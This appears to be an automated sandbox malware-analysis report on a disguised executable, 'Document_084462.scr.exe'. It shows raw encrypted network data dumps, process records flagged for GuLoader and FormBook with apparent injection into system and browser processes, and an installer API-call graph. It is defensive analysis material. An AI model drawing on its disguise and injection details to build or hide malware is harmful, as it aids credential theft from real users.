                                                                            2024-12-03 17:54:21 UTC8000INData Raw: 23 2d cd 3d 52 e0 bb 4a 14 69 2a 28 83 84 a1 47 58 f2 c7 b5 3c 3d 8b f5 58 0b 4e 43 6b 50 b4 f7 6d 02 6d af 21 42 3d 72 68 04 d3 63 18 d8 6d 81 9b 55 09 e0 2c c2 a3 c3 9c dd 2f 85 32 01 1e 4b 71 44 55 fe c8 b0 77 a7 f9 23 f7 9b ff b4 95 44 f1 0f ad 4e 2d 5b 0d 59 10 3f fd 13 8d 45 b2 46 9a cc 53 dc 53 3d 50 a2 6c 12 58 54 7f fe 4c a7 23 0d 69 57 9d 18 39 4a c9 29 67 c2 2d 78 97 96 13 bb f0 eb 90 f4 4d 7e 50 4d 28 f5 0e a6 57 f3 76 14 3e 40 96 7f e0 1d a4 4f 33 f5 8f 2b ac 92 e6 82 3e 56 0e 5d a3 6e 9a b9 e9 57 a1 e7 7a a5 ee 3e ad 81 5e a2 22 ba 0e 10 2e ff d7 76 58 c1 da d2 a2 47 0a bd fb de 4d 6e 44 85 d5 f0 d0 e2 49 6d b5 17 74 f8 a7 b5 b2 36 bd 59 16 7e 5e 57 0f 8b 6d 23 ba 36 85 7e 5c 87 8d bc 92 03 78 18 4c 6d c3 f9 e3 45 fb a8 bb 83 fb eb 54 d5 94
                                                                            Data Ascii: #-=RJi*(GX<=XNCkPmm!B=rhcmU,/2KqDUw#DN-[Y?EFSS=PlXTL#iW9J)g-xM~PM(Wv>@O3+>V]nWz>^".vXGMnDImt6Y~^Wm#6~\xLmET
                                                                            2024-12-03 17:54:21 UTC8000INData Raw: 92 ae e5 a5 35 b3 31 0a d6 19 eb ec 20 13 1a a4 ef 61 4c bf d9 0e 6f f6 a9 b7 5c f2 95 dd 94 45 f1 87 2a 2e 22 72 44 4a 5b a2 dd fd d8 17 60 b0 65 8d 07 94 80 99 ff 23 b6 f5 6d a9 0e dc eb 07 81 78 26 69 be 7d 9d 03 2b 50 51 9d fd 41 e9 c0 62 5a c4 57 b5 e4 16 b8 20 9d 50 87 f1 48 2b ba 2f 80 c6 3c af e2 8d b3 c4 04 d6 4e 33 77 35 a7 54 42 6f 36 d8 84 48 db ad 3e fb 2f 9b dd 3a fc ab 15 f6 81 78 48 47 ff 0e 3d fd 8c 36 07 71 da d8 f3 67 55 6a 72 0f 30 8b 55 ba f8 d5 7b fd 6f 06 9b 00 ca 8e fa 06 86 4a 23 7e 22 8b 78 4f 15 c9 ea b4 bb 4b ca a4 5d c0 c5 e2 0c c8 87 c9 2a 0b b9 ac 66 93 00 6b f2 67 81 1b 0e 2b 5b 21 43 b7 b5 c1 57 f9 b3 8f f3 48 b6 aa a4 d9 16 8d ca b3 c1 58 e7 54 03 71 bc 0d c4 12 9e 05 92 56 85 84 21 d5 dd 3f 22 40 c8 58 e2 a1 c4 96 f9 d2
                                                                            Data Ascii: 51 aLo\E*."rDJ[`e#mx&i}+PQAbZW PH+/<N3w5TBo6H>/:xHG=6qgUjr0U{oJ#~"xOK]*fkg+[!CWHXTqV!?"@X
                                                                            2024-12-03 17:54:21 UTC8000INData Raw: b9 46 49 eb 99 12 9c c0 df 04 cf 8c 7f 26 f6 f5 6d ec c5 d3 c1 78 07 ba 04 d6 fd d3 91 19 52 f0 6c 85 63 6f c4 89 3a cf ed cd 94 a8 27 e9 92 b9 71 f5 b5 e4 3b 45 cd e5 8e f8 24 66 ef 82 cb e7 88 05 c8 ed c4 55 51 be ca b6 bd be 4a 9d 32 de 5a 7a 9a b7 d6 97 66 97 ad 3e f4 61 c8 2f 52 98 0d 1a 86 15 8a b2 b1 4d 28 32 e6 15 cb c1 5c 9d d1 57 66 8e af 5d 59 b5 4a b2 10 7c 85 85 5e 1b 05 e5 4f 22 2c 26 06 f6 03 f3 36 06 58 3f 9b 15 99 fd 95 7d 04 55 06 a4 fd b8 87 32 69 71 32 c5 8f 0c 40 8f 62 4f fd 74 88 57 34 5b 73 25 7a 1c 95 39 c4 be 8c 3e 8b 79 47 43 e7 cb d3 c8 6b a9 f9 99 83 ba e3 5e 5f e9 9a 41 7f 91 85 bb 7b b4 d3 0a ee 93 77 c9 e5 6d 74 e7 44 e0 76 b4 07 c8 c9 7a ef 78 15 9f 70 e4 32 e9 4b dc e2 4d 62 55 83 3d 45 b1 0a ad 0c 8c 61 8c 66 41 63 cf 57
                                                                            Data Ascii: FI&mxRlco:'q;E$fUQJ2Zzf>a/RM(2\Wf]YJ|^O",&6X?}U2iq2@bOtW4[s%z9>yGCk^_A{wmtDvzxp2KMbU=EafAcW
                                                                            2024-12-03 17:54:21 UTC8000INData Raw: de a2 b7 68 75 b1 c9 d5 a5 1a 5a 1e 0f e4 83 c3 01 25 30 6a 54 db e8 17 3a 16 07 98 e0 1e eb 48 54 3c ba 14 df df 2d 19 ca d0 03 98 90 57 f7 d2 8d 30 62 d3 88 2f e8 65 78 d4 97 11 a6 04 68 46 e0 37 bd 1b 39 78 69 b8 71 ac fe 42 58 1d fe ba cf 8c 08 c6 4b 5b 22 ad d7 62 38 18 ad 58 2b 7a ec 9b 74 23 ec 18 60 0a 68 c6 62 9b 0f 82 af d6 1f f1 4e 6d 67 a7 fa 83 c9 ed af 1f a2 32 56 7f 6f ba ad 2e 11 8f 86 90 95 2b ed 16 59 5c 16 83 2c 79 f4 e4 a9 d2 77 e3 71 ff 9d 38 be f4 93 33 b3 8e 05 76 d0 f9 84 e8 44 bd f3 a6 f0 7b a7 19 77 c9 bf 69 ff 61 d5 44 31 e2 19 65 3c 2e 58 c8 2a a8 ec d8 9a b2 01 3e 22 a2 d6 09 13 06 8c f7 4f 88 e3 57 48 32 75 b7 03 85 2b 21 f7 f6 8d 40 ab db b5 58 af bc a1 a8 86 8c b7 91 25 3a 16 e6 2f fc 87 c7 12 16 d7 b7 4c 6a f0 57 53 ca cf
                                                                            Data Ascii: huZ%0jT:HT<-W0b/exhF79xiqBXK["b8X+zt#`hbNmg2Vo.+Y\,ywq83vD{wiaD1e<.X*>"OWH2u+!@X%:/LjWS
                                                                            2024-12-03 17:54:21 UTC8000INData Raw: f3 1c 54 63 a5 0c ca e0 b9 50 06 78 33 4b a6 fc c1 dd 5e 89 c6 80 94 01 c1 b4 d2 11 3d 61 6f ce d4 1b b0 fb 33 be 4b d5 32 4b 4e 54 0b ec c2 83 9f 82 94 0b a2 f5 e8 0e 53 df 6b a6 2f 72 af 37 31 fd c2 c4 49 18 e7 26 04 4d 84 61 7a f1 47 1a e2 f2 c8 b0 79 c2 28 83 51 09 b4 fa 6c b8 af 2d 63 0f 3f f6 73 29 02 0f 55 54 60 a2 cb 4d 00 09 04 75 0a 1e cc a6 20 b4 ab 6f 9c dd 33 be 12 4d 80 3e e7 be cf ee 51 65 6d b0 cb d5 00 31 57 29 36 73 d8 8c db d0 b7 02 ee 6d 9a 96 12 21 83 0b e7 d6 f3 64 87 62 b0 17 83 27 e5 e0 b0 ca 07 01 1d 11 f3 ff 65 48 db 91 ab 83 51 1b c1 ba 82 a1 84 fe af f7 aa 46 18 17 02 3e 3d c2 4c 1b 7c 91 d9 ec 16 47 85 0a 35 24 f5 bf 24 1e f7 b0 c0 e2 6c 53 0f ba 21 6b 47 a0 f0 d5 56 f3 60 8b 6e 91 1e 6f 12 09 a2 50 62 a7 38 98 04 83 64 d4 85
                                                                            Data Ascii: TcPx3K^=ao3K2KNTSk/r71I&MazGy(Ql-c?s)UT`Mu o3M>Qem1W)6sm!db'eHQF>=L|G5$$lS!kGV`noPb8d
                                                                            2024-12-03 17:54:21 UTC8000INData Raw: 14 90 78 97 03 b6 fb ff c6 98 ca 7f 3c ae e2 25 74 38 c7 8b d0 fd e0 ee 68 ad 0b 1b 3a c9 fa f7 95 82 90 bd 77 51 96 06 4e d3 ac cf 11 8d 81 92 1f c8 99 88 1c c6 f8 fd de ea 98 83 be db 8e 57 50 56 54 e0 cf 65 c1 b1 91 2d bc 10 4c f1 5a 79 36 bf 8b 79 c7 4f 5d f8 42 12 31 7e c0 94 73 e2 d2 4a e8 52 5f 27 59 cb 34 36 7c ed 8f 27 b0 a3 64 6d ea 98 74 00 bb 93 3e 69 a8 4f ee 42 2a f4 40 03 41 4b 67 48 f3 b7 bd d2 f4 e0 4d 35 9a 42 8f 84 f6 87 42 69 c8 15 dd d1 04 c9 88 c5 a3 a0 a3 15 28 25 ad de 43 8c 2e 26 86 87 6d 4d 1b e1 76 e1 07 10 98 20 83 ea 95 4a 33 9c 56 ff ab 8f 2c b5 8d 7e 02 3e 7b cb 0a 83 a7 c9 f7 58 5a 34 4d 3b d0 19 09 be 17 1a 52 1d f5 3e 2c c8 52 0d f1 c4 2b 61 7f 39 56 46 2d 0c 35 23 8b 4b 20 66 c2 2a 74 10 fb df 65 95 e0 dd bb a8 e3 53 b6
                                                                            Data Ascii: x<%t8h:wQNWPVTe-LZy6yO]B1~sJR_'Y46|'dmt>iOB*@AKgHM5BBi(%C.&mMv J3V,~>{XZ4M;R>,R+a9VF-5#K f*teS
                                                                            2024-12-03 17:54:21 UTC8000INData Raw: 31 a0 f1 2a d8 64 1c ca b1 32 c3 10 03 55 76 1a c7 10 bd 8b 18 95 84 54 69 70 b9 1d cf 28 91 e1 78 26 bd 74 2c 6d 65 69 7e 7d 91 9f 03 52 91 f6 96 95 11 be 30 e8 2a c5 b5 22 28 91 e6 b1 8d 75 8c ca 68 c0 3d 7b 5b db 7a 41 77 b8 67 75 3a 4e 5a bc a5 de d5 0a a0 57 8b 5d 47 82 7d bc 88 07 ef 4c 06 58 9a 6b 52 1e e1 b2 ad d1 f5 98 a6 25 e1 a9 96 51 63 09 14 09 a0 78 66 42 1a a3 5b b1 78 01 8a e6 91 3b 7c e2 71 47 aa 89 72 c4 cd 03 9f ce 51 7f af 3a e9 63 fe c9 ef 42 f1 09 37 3c 8f 92 86 b4 2e cd 33 9a 63 e3 b1 d4 c8 0d d7 77 31 94 5d 26 ba 43 89 35 36 f9 e9 d3 0c 6d e5 22 64 6b 1f 7a f7 4e 28 fa 3d a8 09 8d 47 a5 4f 3a fc fd 6b df 24 12 f0 6a 75 dd fb 3e d7 04 12 04 15 81 5a 42 21 b5 ab 0b a1 03 88 3d 74 b5 44 e4 e7 eb b1 61 e0 3b 6a 7f 20 ce ea f1 56 fe cf
                                                                            Data Ascii: 1*d2UvTip(x&t,mei~}R0*"(uh={[zAwgu:NZW]G}LXkR%QcxfB[x;|qGrQ:cB7<.3cw1]&C56m"dkzN(=GO:k$ju>ZB!=tDa;j V
                                                                            2024-12-03 17:54:21 UTC8000INData Raw: 52 68 c6 62 e5 c9 fa d7 24 13 78 a4 b4 52 1d 7e 82 79 bd 34 a8 58 c7 08 7d 4a 50 0d 92 33 4e 02 36 3f de 66 d6 7c 5a 1a bd d8 a6 55 e7 b2 59 be 08 21 53 87 d7 73 6e 35 f2 67 7d 13 7a fe bd f3 a6 0c d7 c9 02 c1 2c c4 c4 93 e4 e3 3d 6d 72 df 51 d3 bd e0 4d 86 23 b2 73 ff 0b 88 a9 e4 48 71 fd ca 63 8e 90 e1 d8 41 f0 0f bd e7 25 fa 27 da fa 70 08 a2 b0 f2 26 0a da 9a 09 b7 3a 5a 8e 33 82 ae a8 75 42 db 41 2c 90 dc 3c 19 b4 b5 3d 9f 06 87 04 83 9b 86 0a 5f dc ec 8c c9 7b 4f e3 32 26 b0 22 ef fe 8d c1 a7 f7 93 38 7e c1 88 f1 df 92 08 50 4c e1 a8 bf 23 87 9d 9f 86 86 b6 c0 31 2c 37 d3 25 bb 6d 8e a3 d8 3f 82 6c b0 ac d8 1c 79 ca b2 81 98 03 0d 21 65 62 bc 24 9f b9 0c ec 14 98 fd e3 97 26 f4 a2 8e 04 db ac af 00 f4 7c 4d 07 7a 3f 1f 77 2e dc 63 3b 6e 9b f6 f7 41
                                                                            Data Ascii: Rhb$xR~y4X}JP3N6?f|ZUY!Ssn5g}z,=mrQM#sHqcA%'p&:Z3uBA,<=_{O2&"8~PL#1,7%m?ly!eb$&|Mz?w.c;nA


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:12:53:26
                                                                            Start date:03/12/2024
                                                                            Path:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Document_084462.scr.exe"
                                                                            Imagebase:0x400000
                                                                            File size:456'022 bytes
                                                                            MD5 hash:B4E362177A0E0836DD04831FE456255B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.12951622773.0000000009B40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:1
                                                                            Start time:12:54:08
                                                                            Start date:03/12/2024
                                                                            Path:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Document_084462.scr.exe"
                                                                            Imagebase:0x400000
                                                                            File size:456'022 bytes
                                                                            MD5 hash:B4E362177A0E0836DD04831FE456255B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.13274732696.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.13274829512.00000000067E0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:12:54:34
                                                                            Start date:03/12/2024
                                                                            Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                            Imagebase:0x140000000
                                                                            File size:16'696'840 bytes
                                                                            MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:3
                                                                            Start time:12:54:35
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\SysWOW64\waitfor.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\waitfor.exe"
                                                                            Imagebase:0x930000
                                                                            File size:32'768 bytes
                                                                            MD5 hash:E58E152B44F20DD099C5105DE482DF24
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.16927455279.00000000048A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.16927359269.0000000004850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:4
                                                                            Start time:12:54:59
                                                                            Start date:03/12/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff78a190000
                                                                            File size:597'432 bytes
                                                                            MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:17.8%
                                                                              Dynamic/Decrypted Code Coverage:13.6%
                                                                              Signature Coverage:16.6%
                                                                              Total number of Nodes:1580
                                                                              Total number of Limit Nodes:30
                                                                              execution_graph 4024 401941 4025 401943 4024->4025 4030 402d3e 4025->4030 4031 402d4a 4030->4031 4075 40642b 4031->4075 4034 401948 4036 405b00 4034->4036 4117 405dcb 4036->4117 4039 405b28 DeleteFileW 4041 401951 4039->4041 4040 405b3f 4042 405c6a 4040->4042 4131 4063ee lstrcpynW 4040->4131 4042->4041 4160 40674c FindFirstFileW 4042->4160 4044 405b65 4045 405b78 4044->4045 4046 405b6b lstrcatW 4044->4046 4132 405d0f lstrlenW 4045->4132 4047 405b7e 4046->4047 4051 405b8e lstrcatW 4047->4051 4053 405b99 lstrlenW FindFirstFileW 4047->4053 4051->4053 4052 405c88 4163 405cc3 lstrlenW CharPrevW 4052->4163 4054 405c5f 4053->4054 4056 405bbb 4053->4056 4054->4042 4058 405c42 FindNextFileW 4056->4058 4068 405b00 60 API calls 4056->4068 4070 405456 24 API calls 4056->4070 4136 4063ee lstrcpynW 4056->4136 4137 405ab8 4056->4137 4145 405456 4056->4145 4156 4061b4 MoveFileExW 4056->4156 4058->4056 4062 405c58 FindClose 4058->4062 4059 405ab8 5 API calls 4061 405c9a 4059->4061 4063 405cb4 4061->4063 4064 405c9e 4061->4064 4062->4054 4066 405456 24 API calls 4063->4066 4064->4041 4067 405456 24 API calls 4064->4067 4066->4041 4069 405cab 4067->4069 4068->4056 4071 4061b4 36 API calls 4069->4071 4070->4058 4073 405cb2 4071->4073 4073->4041 4089 406438 4075->4089 4076 406683 4077 402d6b 4076->4077 4108 4063ee lstrcpynW 4076->4108 4077->4034 4092 40669d 4077->4092 4079 406651 lstrlenW 4079->4089 4082 40642b 10 API calls 4082->4079 4084 406566 GetSystemDirectoryW 4084->4089 4085 406579 GetWindowsDirectoryW 4085->4089 4086 40669d 5 API calls 4086->4089 4087 40642b 10 API calls 4087->4089 4088 4065f4 lstrcatW 4088->4089 4089->4076 4089->4079 4089->4082 4089->4084 4089->4085 4089->4086 4089->4087 4089->4088 4090 4065ad SHGetSpecialFolderLocation 4089->4090 4101 4062bc 4089->4101 4106 406335 wsprintfW 4089->4106 4107 4063ee lstrcpynW 4089->4107 4090->4089 4091 4065c5 SHGetPathFromIDListW CoTaskMemFree 4090->4091 4091->4089 4098 4066aa 4092->4098 4093 406725 CharPrevW 4097 406720 4093->4097 4094 406713 CharNextW 4094->4097 4094->4098 4095 406746 4095->4034 4097->4093 4097->4095 4098->4094 4098->4097 4099 4066ff CharNextW 4098->4099 4100 40670e CharNextW 4098->4100 4113 405cf0 4098->4113 4099->4098 4100->4094 4109 40625b 4101->4109 4104 4062f0 RegQueryValueExW RegCloseKey 4105 406320 4104->4105 4105->4089 4106->4089 4107->4089 4108->4077 4110 40626a 4109->4110 4111 406273 RegOpenKeyExW 4110->4111 4112 40626e 4110->4112 4111->4112 4112->4104 4112->4105 4114 405cf6 4113->4114 4115 405d0c 4114->4115 4116 405cfd CharNextW 4114->4116 4115->4098 4116->4114 4166 4063ee lstrcpynW 4117->4166 4119 405ddc 4167 405d6e CharNextW CharNextW 4119->4167 4122 405b20 4122->4039 4122->4040 4123 40669d 5 API calls 4129 405df2 4123->4129 4124 405e23 lstrlenW 4125 405e2e 4124->4125 4124->4129 4126 405cc3 3 API calls 4125->4126 4128 405e33 GetFileAttributesW 4126->4128 4127 40674c 2 API calls 4127->4129 4128->4122 4129->4122 4129->4124 4129->4127 4130 405d0f 2 API calls 4129->4130 4130->4124 4131->4044 4133 405d1d 4132->4133 4134 405d23 CharPrevW 4133->4134 4135 405d2f 4133->4135 4134->4133 4134->4135 4135->4047 4136->4056 4173 405ebf GetFileAttributesW 4137->4173 4140 405ae5 4140->4056 4141 405ad3 RemoveDirectoryW 4143 405ae1 4141->4143 4142 405adb DeleteFileW 4142->4143 4143->4140 4144 405af1 SetFileAttributesW 4143->4144 4144->4140 4146 405471 4145->4146 4154 405513 4145->4154 4147 40548d lstrlenW 4146->4147 4148 40642b 17 API calls 4146->4148 4149 4054b6 4147->4149 4150 40549b lstrlenW 4147->4150 4148->4147 4152 4054c9 4149->4152 4153 4054bc SetWindowTextW 4149->4153 4151 4054ad lstrcatW 4150->4151 4150->4154 4151->4149 4152->4154 4155 4054cf SendMessageW SendMessageW SendMessageW 4152->4155 4153->4152 4154->4056 4155->4154 4157 4061d5 4156->4157 4158 4061c8 4156->4158 4157->4056 4176 40603a 4158->4176 4161 406762 FindClose 4160->4161 4162 405c84 4160->4162 4161->4162 4162->4041 4162->4052 4164 405c8e 4163->4164 4165 405cdf lstrcatW 4163->4165 4164->4059 4165->4164 4166->4119 4168 405d8b 4167->4168 4169 405d9d 4167->4169 4168->4169 4170 405d98 CharNextW 4168->4170 4171 405cf0 CharNextW 4169->4171 4172 405dc1 4169->4172 4170->4172 4171->4169 4172->4122 4172->4123 4174 405ed1 SetFileAttributesW 4173->4174 4175 405ac4 4173->4175 4174->4175 4175->4140 4175->4141 4175->4142 4177 406090 GetShortPathNameW 4176->4177 4178 40606a 4176->4178 4179 4060a5 4177->4179 4180 4061af 4177->4180 4203 405ee4 GetFileAttributesW CreateFileW 4178->4203 4179->4180 4183 4060ad wsprintfA 4179->4183 4180->4157 4182 406074 CloseHandle GetShortPathNameW 4182->4180 4184 406088 4182->4184 4185 40642b 17 API calls 4183->4185 4184->4177 4184->4180 4186 4060d5 4185->4186 4204 405ee4 GetFileAttributesW CreateFileW 4186->4204 4188 4060e2 4188->4180 4189 4060f1 GetFileSize GlobalAlloc 4188->4189 4190 406113 4189->4190 4191 4061a8 CloseHandle 4189->4191 4205 405f67 ReadFile 4190->4205 4191->4180 4196 406132 lstrcpyA 4199 406154 4196->4199 4197 406146 4198 405e49 4 API calls 4197->4198 4198->4199 4200 40618b SetFilePointer 4199->4200 4212 405f96 WriteFile 4200->4212 4203->4182 4204->4188 4206 405f85 4205->4206 4206->4191 4207 405e49 lstrlenA 4206->4207 4208 405e8a lstrlenA 4207->4208 4209 405e92 4208->4209 4210 405e63 lstrcmpiA 4208->4210 4209->4196 4209->4197 4210->4209 4211 405e81 CharNextA 4210->4211 4211->4208 4213 405fb4 GlobalFree 4212->4213 4213->4191 4214 4015c1 4215 402d3e 17 API calls 4214->4215 4216 4015c8 4215->4216 4217 405d6e 4 API calls 4216->4217 4229 4015d1 4217->4229 4218 401631 4220 401663 4218->4220 4221 401636 4218->4221 4219 405cf0 CharNextW 4219->4229 4224 401423 24 API calls 4220->4224 4241 401423 4221->4241 4230 40165b 4224->4230 4228 40164a SetCurrentDirectoryW 4228->4230 4229->4218 4229->4219 4231 401617 GetFileAttributesW 4229->4231 4233 4059bf 4229->4233 4236 405925 CreateDirectoryW 4229->4236 4245 4059a2 CreateDirectoryW 4229->4245 4231->4229 4248 4067e3 GetModuleHandleA 4233->4248 4237 405972 4236->4237 4238 405976 GetLastError 4236->4238 4237->4229 4238->4237 4239 405985 SetFileSecurityW 4238->4239 4239->4237 4240 40599b GetLastError 4239->4240 4240->4237 4242 405456 24 API calls 4241->4242 4243 401431 4242->4243 4244 4063ee lstrcpynW 4243->4244 4244->4228 4246 4059b2 4245->4246 4247 4059b6 GetLastError 4245->4247 4246->4229 4247->4246 4249 406809 GetProcAddress 4248->4249 4250 4067ff 4248->4250 4252 4059c6 4249->4252 4254 406773 GetSystemDirectoryW 4250->4254 4252->4229 4253 406805 4253->4249 4253->4252 4255 406795 wsprintfW LoadLibraryExW 4254->4255 4255->4253 5002 402a42 5003 402d1c 17 API calls 5002->5003 5004 402a48 5003->5004 5005 402a88 5004->5005 5006 402a6f 5004->5006 5015 402925 5004->5015 5007 402aa2 5005->5007 5008 402a92 5005->5008 5011 402a74 5006->5011 5012 402a85 5006->5012 5010 40642b 17 API calls 5007->5010 5009 402d1c 17 API calls 5008->5009 5009->5015 5010->5015 5016 4063ee lstrcpynW 5011->5016 5017 406335 wsprintfW 5012->5017 5016->5015 5017->5015 5018 401c43 5019 402d1c 17 API calls 5018->5019 5020 401c4a 5019->5020 5021 402d1c 17 API calls 5020->5021 5022 401c57 5021->5022 5023 401c6c 5022->5023 5024 402d3e 17 API calls 5022->5024 5025 401c7c 5023->5025 5026 402d3e 17 API calls 5023->5026 5024->5023 5027 401cd3 5025->5027 5028 401c87 5025->5028 5026->5025 5029 402d3e 17 API calls 5027->5029 5030 402d1c 17 API calls 5028->5030 5031 401cd8 5029->5031 5032 401c8c 5030->5032 5034 402d3e 17 API calls 5031->5034 5033 402d1c 17 API calls 5032->5033 5035 401c98 5033->5035 5036 401ce1 FindWindowExW 5034->5036 5037 401cc3 SendMessageW 5035->5037 5038 401ca5 SendMessageTimeoutW 5035->5038 5039 401d03 5036->5039 5037->5039 5038->5039 5040 402b43 5041 4067e3 5 API calls 5040->5041 5042 402b4a 5041->5042 5043 402d3e 17 API calls 5042->5043 5044 402b53 5043->5044 5045 402b57 IIDFromString 5044->5045 5047 402b8e 5044->5047 5046 402b66 5045->5046 5045->5047 5046->5047 5050 4063ee lstrcpynW 5046->5050 5049 402b83 CoTaskMemFree 5049->5047 5050->5049 5051 402947 5052 402d3e 17 API calls 5051->5052 5053 402955 5052->5053 5054 40296b 5053->5054 5055 402d3e 17 API calls 5053->5055 5056 405ebf 2 API calls 5054->5056 5055->5054 5057 402971 5056->5057 5079 405ee4 GetFileAttributesW CreateFileW 5057->5079 5059 40297e 5060 402a21 5059->5060 5061 40298a GlobalAlloc 5059->5061 5064 402a29 DeleteFileW 5060->5064 5065 402a3c 5060->5065 5062 4029a3 5061->5062 5063 402a18 CloseHandle 5061->5063 5080 40345a SetFilePointer 5062->5080 5063->5060 5064->5065 5067 4029a9 5068 403444 ReadFile 5067->5068 5069 4029b2 GlobalAlloc 5068->5069 5070 4029c2 5069->5070 5071 4029f6 5069->5071 5072 40324c 31 API calls 5070->5072 5073 405f96 WriteFile 5071->5073 5078 4029cf 5072->5078 5074 402a02 GlobalFree 5073->5074 5075 40324c 31 API calls 5074->5075 5076 402a15 5075->5076 5076->5063 5077 4029ed GlobalFree 5077->5071 5078->5077 5079->5059 5080->5067 5081 4053ca 5082 4053da 5081->5082 5083 4053ee 5081->5083 5085 4053e0 5082->5085 5086 405437 5082->5086 5084 4053f6 IsWindowVisible 5083->5084 5088 40540d 5083->5088 5084->5086 5087 405403 5084->5087 5090 404390 SendMessageW 5085->5090 5089 40543c CallWindowProcW 5086->5089 5094 404cff SendMessageW 5087->5094 5088->5089 5099 404d7f 5088->5099 5092 4053ea 5089->5092 5090->5092 5095 404d22 GetMessagePos ScreenToClient SendMessageW 5094->5095 5096 404d5e SendMessageW 5094->5096 5097 404d56 5095->5097 5098 404d5b 5095->5098 5096->5097 5097->5088 5098->5096 5108 4063ee lstrcpynW 5099->5108 5101 404d92 5109 406335 wsprintfW 5101->5109 5103 404d9c 5104 40140b 2 API calls 5103->5104 5105 404da5 5104->5105 5110 4063ee lstrcpynW 5105->5110 5107 404dac 5107->5086 5108->5101 5109->5103 5110->5107 5111 700b1000 5114 700b101b 5111->5114 5121 700b1516 5114->5121 5116 700b1020 5117 700b1027 GlobalAlloc 5116->5117 5118 700b1024 5116->5118 5117->5118 5119 700b153d 3 API calls 5118->5119 5120 700b1019 5119->5120 5123 700b151c 5121->5123 5122 700b1522 5122->5116 5123->5122 5124 700b152e GlobalFree 5123->5124 5124->5116 5128 4016cc 5129 402d3e 17 API calls 5128->5129 5130 4016d2 GetFullPathNameW 5129->5130 5131 40170e 5130->5131 5132 4016ec 5130->5132 5133 402bc2 5131->5133 5134 401723 GetShortPathNameW 5131->5134 5132->5131 5135 40674c 2 API calls 5132->5135 5134->5133 5136 4016fe 5135->5136 5136->5131 5138 4063ee lstrcpynW 5136->5138 5138->5131 5139 401e4e GetDC 5140 402d1c 17 API calls 5139->5140 5141 401e60 GetDeviceCaps MulDiv ReleaseDC 5140->5141 5142 402d1c 17 API calls 5141->5142 5143 401e91 5142->5143 5144 40642b 17 API calls 5143->5144 5145 401ece CreateFontIndirectW 5144->5145 5146 402630 5145->5146 5147 402acf 5148 402d1c 17 API calls 5147->5148 5149 402ad5 5148->5149 5150 402b12 5149->5150 5151 402ae7 5149->5151 5153 402925 5149->5153 5152 40642b 17 API calls 5150->5152 5150->5153 5151->5153 5155 406335 wsprintfW 5151->5155 5152->5153 5155->5153 4728 4020d0 4729 4020e2 4728->4729 4730 402194 4728->4730 4731 402d3e 17 API calls 4729->4731 4733 401423 24 API calls 4730->4733 4732 4020e9 4731->4732 4734 402d3e 17 API calls 4732->4734 4739 4022ee 4733->4739 4735 4020f2 4734->4735 4736 402108 LoadLibraryExW 4735->4736 4737 4020fa GetModuleHandleW 4735->4737 4736->4730 4738 402119 4736->4738 4737->4736 4737->4738 4751 406852 4738->4751 4742 402163 4744 405456 24 API calls 4742->4744 4743 40212a 4745 402132 4743->4745 4746 402149 4743->4746 4747 40213a 4744->4747 4748 401423 24 API calls 4745->4748 4756 700b1777 4746->4756 4747->4739 4749 402186 FreeLibrary 4747->4749 4748->4747 4749->4739 4798 406410 WideCharToMultiByte 4751->4798 4753 40686f 4754 406876 GetProcAddress 4753->4754 4755 402124 4753->4755 4754->4755 4755->4742 4755->4743 4757 700b17aa 4756->4757 4799 700b1b5f 4757->4799 4759 700b17b1 4760 700b18d6 4759->4760 4761 700b17c9 4759->4761 4762 700b17c2 4759->4762 4760->4747 4833 700b23e0 4761->4833 4849 700b239e 4762->4849 4767 700b180f 4862 700b25b5 